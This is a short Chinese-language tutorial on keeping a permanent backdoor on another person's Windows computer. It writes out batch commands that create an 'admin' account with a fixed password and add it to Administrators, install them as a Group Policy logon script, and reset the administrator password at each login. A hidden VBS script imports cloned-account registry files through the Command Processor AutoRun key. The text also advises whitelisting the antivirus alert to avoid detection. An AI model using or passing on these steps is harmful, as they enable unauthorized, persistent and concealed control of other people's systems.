windows 永久留后门

将下面内容存为1.bat
@echo off
net user admin 123456 /add
net localgroup administrators admin /add
注释：前面名字随便，后面格式一定要是bat；
把这个文件拷贝到对方电脑C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon文件目录下，没有的话自己创建。（或任意目录下，但都必须将文件路径添加到组策略》用户配置》Windows设置》登录（脚本）》登录属性的文件添加）

如果将1.bat内容改为
@echo off
net user administrator 123456
那么每次有管理员组用户登录就会将administrator的密码改为123456

另外一种命令行截持重建帐号的方法：（注：3fb.reg中的"F"键值对需覆盖为1F4.reg中的"F"键值对）
将已在注册中克隆好的帐号分别导出一份，比如"admin$.reg"和"3fb.reg"复制c:\windows\目录下，然后在同目录下建立一个cmd.vbs脚本内容如下：
On Error Resume Next
set shell_member=wscript.createobject("wscript.shell")
shell_member.run "regedit.exe /s admin$.reg",0
shell_member.run "regedit.exe /s 3fb.reg",0 注释 # 0 表示窗口隐藏后台执行
在注册表中这个项KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun键值中输入我们的脚本路径就OK。
（这个项起的作用是只要管理员组用户再一次重新打开CMD自动运行我们编辑好的脚本文件）
提示：360安全卫士能查的出来显示为“命令行截持”，把它加入信任了就没事了
注：此法需要开启hklm\sam\sam中最后一个sam的管理员组完全控制权

参考链接：1、windows服务器建立永久后门帐号方法
2、用批处理建立隐藏超级管理员账户
3、windows下建立永久帐号方法--内有惊喜方法

安静运行批处理的vbs脚本

（待复现）4、使用NTFS数据流制作一个永久性后门

其中，脚本地址